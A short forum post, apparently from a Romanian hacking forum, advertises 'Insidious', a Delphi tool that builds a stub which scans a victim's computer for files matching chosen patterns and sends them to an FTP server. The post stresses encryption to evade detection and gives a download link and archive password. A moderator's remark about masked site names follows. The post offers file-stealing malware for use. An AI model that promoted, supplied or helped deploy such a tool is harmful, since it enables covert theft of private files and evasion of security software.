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*ro*anforg*e.com proudly present a new tool that will give you the ability to generate a small stub specially made to probe all the files on your computer and send the matching files (using your custom patterns) to a FTP server.

The program was 100% coded in pascal/delphi and is not using shit libraries but full API's dynamically loaded and of course fully encrypted to avoid some detections.

It support single or multithreaded file transfer and a bunch of options for the file probe process. way i recommend to use single thread transfer if you plan to transfer small files (< 2 Mo) such as pictures and using multithread when you plan to transfer large file to avoid blocking other possible small files.





Download: Insidious.rar

Pasw: trojanforgee.com

* = fara publicitate

Edited by em
Nu era nevoie de stelutele alea deloc. Mai ales in parola arhivei.
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